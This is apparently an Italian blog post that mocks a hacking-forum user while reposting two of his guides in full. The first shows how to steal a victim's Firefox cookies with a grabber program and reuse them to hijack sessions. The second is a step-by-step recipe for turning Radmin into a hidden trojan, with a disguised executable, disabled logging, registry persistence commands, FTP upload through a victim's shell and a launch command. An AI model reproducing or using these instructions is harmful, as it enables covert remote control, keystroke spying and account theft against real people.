I grandi posts di preserva

Oggi stavo visitando qualche post del più grande hacker della storia… ma come non avete capito? Nooo non è Stallman ma è preserva!
E già lui ha un grande fama e lo conosce tutto il web.
Comunque bando alle ciance, ora vi posto due dei sue ultimi topic nella zona Hacking di Lamering 2.0:
cookie grabber, fire fox 3 (firefox non fire fox ignorante!)

AUTORI: the-end89 & rastaman92

SOLO CON FIREFOX 3

Firefox si aggiorna ma non può credere di riuscire a scappare da noi due quindi:
Ecco la nuova versione del cookie grabber targato the-end89 e rastaman92.

I nostri amici di firefox promettono maggiore sicurezza in ambito di protezione dati personali ecc, bene si sbagliano (XD).
Come per la versione precendete di firefox è sempre presente la famosa cartella che cambia il proprio nome ad ogni installazione,
ma il problema non è di certo questo (LOL).
La sfida che questa volta il nostro firefox ci propone è la seguente.

Il file contenente i cookies è sempre presente in:
CODICE
%­homepath%Dati applicazioniMozillaFirefoxProfiles(variabile profilo).defaultcookies.sqlite

Ma come avrete notato l’estensione del file contenente i cookies da estensione .txt è diventato .sqlite rendendo la lettura del

file poco più complicata.

Ora che vi ho fatto un pò di lezione vi serve la nuova versione del programma scaricabile da qui

Password archivio
“L’ archivio è protetto da password per svariati motivi, non per questo dovete ritirarvi dallo scaricare il nostro favoloso programma. Infatti per ottenere la password basta contattarmi(in privato) e la password vi sarà data senza alcun problema. Chiediamo solo di non diffondere la password a nostra insaputa, tanto la cediamo con piacere a chi ce ne fa richiesta😉
Per il momento abbiamo deciso di fornire le password solo ai primi 100 che le richiederanno quindi: avanti con le richieste!
the-end89

Scaricato il programma vi basterà mandarlo alla vittima e farglielo avviare, successivamente il programma copierà di netto il file cookies.sqlite
in %­systemdrive% non variando il suo nome e lascierà a voi il problema di prelevarlo come più vi fa comodo (eh si).

Ora che possedete finalmente i cookies della vittima dovete sostituirli ai vostri, quindi recatevi in:

CODICE
%­homepath%Dati applicazioniMozillaFirefoxProfiles(variabile profilo).default

Togliete i vostri o sostituiteli direttamente con i nuovi e navigate pure🙂

Se volete un modo per scoprire quali siti sono salvati nel file cookies.sqlite basta rinominarlo in cookies.txt ed aprirlo con ilblocco note.

Altrimenti un’altro metodo è quello di aprire il blocco note e creare un file .reg con il seguente codice:

CODICE
REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREClasses*shell]
[HKEY_LOCAL_MACHINESOFTWAREClasses*shellLeggi]
[HKEY_LOCAL_MACHINESOFTWAREClasses*shellLeggicommand]
@=”notepad %1”

Salvatelo in nome-che-volete.reg e avviatelo.
In questo modo aggiungerete un tasto nuovo di chiamato “leggi” quando farete click destro su un file e potrete aprirlo con il blocco note
(qualsiasi file esso sia).
Sfruttando questo trucco potrete aprire il file dei cookies anche se presente l’estensione .sqlite

Ora date una sbirciata ai siti che sono presenti nel file e andate a farci una visitina (asd).

La guida non è sua, è old e sopratutto è da veri lamers! LINK

Prossimo topic:
Radmin (installazione in remoto), trojan————> -.-”

###############
Guida by preserva
###############

Si è pregati di inserire l’autore e di non compiere cattive azioni con questa guida..è a scopo informativo come tutte le altre🙂

Ho voluto fare questa guida dato ke per Radmin non ce ne sono..
ho utilizzato la versione 2.1 perkè con le versioni vekkie si hanno più possibilità di compiere bypass nei sistemi di sicurezza di un pc. Radmin è uno dei tanti software per il controllo remoto,ed è reperibile in rete nel sito uffficiale http://www.radmin.com.
Ovviamente la versione è aggiornata,ma voi provate lo stesso per vedere se funziona..tanto nn ve costa niente :asd:

Cosa ci permetterà di fare radmin?
—————————————————–
-creare una shell remota apposita per radmin
-una scrittura remota della nostra vittima dalla propria macchina
-spiare ciò che scrive
-scaricare e caricare archivi contenenti dei file
-avere una visione in tempo reale del suo desktop
——————————————————

A questo punto siamo pronti per incominciare:
-Installiamo Radmin nel nostro pc
-apriamo una shell, basterà andare su start–>esegui–>cmd o command.com a seconda del nostro caso e ci indirizziamo nel percorso dove abbiamo installato radmin, cioè C:\Programmi\Radmin
-a questo punto scriviamo:
CODICE
C:\Programmi\Radmin

eseguendo
CODICE
C:\Programmi\Radmin\r_server.exe /setup

comparira una finestra nella quale potremo configuarlo a nostro piacimento

-scegliamo l’opzione Set password

adesso procediamo nell’inserire la nostra password,contenente minimo 8 caratteri,prima di dare ok,bisogna disattivare l’opzione Enable NT security e diamo OK

-adesso ci dirigiamo all’opzione Options

in port mettete qll ke volete, sarebbe la porta ke radmin usera per collegarsi al server, vi consiglio di usare porte superiori a 1000 per avere una possibilità minore di sospetti, mentre nelle restanti opzioni, assicuratevi ke tutto sia disattivato, evitiamo di lasciare logs di qualsiasi tipo, adesso diamo ok e exit

-a questo punto,ke abbiamo il nostro radmin modificato, vi spiegherò i 2 metodi, uno per installarlo da shell remota del utente e un altra per fare un solo eseguibile ke abbia gia il nostrp radmin e la sua configurazione

-dirigiamoci nel registro di sistema nel seguente percorso
CODICE
HKEY_LOCAL_MACHINE\System\Radmin\v2.1\Server\Parameters

e ci focalizziamo nelle seguenti entrate:

Port qui c’è la porta ke abbiamo messo solo ke in hexadecimal
Parameter sta nel contrassegno
DisableTrayIcon è l’opzione per nascondere l’icona. Quello ke andiamo a fare, è copiare i valori di qll 3 entrate, nel mio caso i valori furono questi:

Port : 2500
Parameter 0f5bb8ee24548ba202dc083cc6dec3c1
DisableTrayIcon 01000000 (ke dovrebbe essere uguale per tutti)

-Adesso ci dirigiamo nella cartella dove abbiamo radmin e gli cambiamo il nome in r_server.exe in un altro meno sospettabile, io lo rinominai sotto il nome di spoolvs.exe e cn il programma apposta, gli cambiai l’icona :asd:

-adesso andiamo a fare un bat ke ci aggiunga le kiavi nel registro e ke faccia partire radmin con l’avvio di microsoft:
CODICE
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.1Server\Parameters /v Port /t REG_BINARY /d “b7060000”
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.1\Server\Parameters /v Parameter /t REG_BINARY /d “0f5bb8ee24548ba202dc083cc6dec3c1”
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d “C:\windows\system32\spoolvs.exe”

ovviamente dovete modificare il bat con i vostri valori..

-adesso bisogna caricare l’arkivio tramite ftp

-una volta ke abbiamo una shell remota della vittima, gli andremmo a uppare radmin seguendo l’esempio

CODICE
ftp -i suoip get spoolvs.exe C:\windows\system32\spoolvs.exe
(radmin da noi rinominato)

CODICE
ftp -i suoip get AdmDll.dll C:\windows\system32\AdmDll.dll
(qui nn tokkiamo neitne perkè stiamo caricando la dll del radmin)

CODICE
ftp -i suoip get nome.bat C:\window\ssystem32\nome.bat
(questo è il bat ke si occupa di caricare i valori nel registro di sistema)

-adesso basta solo eseguire il bat dalla shell ke già avevamo congfigurata precedentemente

– eseguire radmin e dalla shell scrivere:

spoolvs.exe /pass:miapassword /port:2500(quella ke avevo configurato io)

io gli misi al mio radmin spoolvs.exe pero ogniuno è libero di rinominarlo come gli pare, in questo modo riusciamo tranquillamente a entrare col cliente(radmin.exe) e avere il controllo del pc senza necessita di aspettare ke riavviia il sistema per apportare le modifike.

-il trojan per radmin è pronto da mandare alla vittima

preserva vi agura di non fare lamerate (nn è detto ke a tutti funziona questo trojan :asd: :asd:

Inizio a leggere: by preserva (questa è brutta)… comunque è risaputo che creare trojan è da veri hacker!
Ma perché fino ad ora non ho mai letto un source di un qualche linguaggio di programmazione by preserva????!!!!!

In ultimo ma non meno importante il rip dell’xss a super eva (che in realtà è by Raijin’)
Il link del topic è questo: http://hacking2.0.forumcommunity.net/?t=12782813

E la cosa che più mi sconvolge sono le risposte:
mitico, favoloso, grande, etc etc
… Ma grande per cosa? Per avere postato una xss che non è nemmeno sua?!!

Mah, come ci siamo ridotti!

12 risposte a “I grandi posts di preserva

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...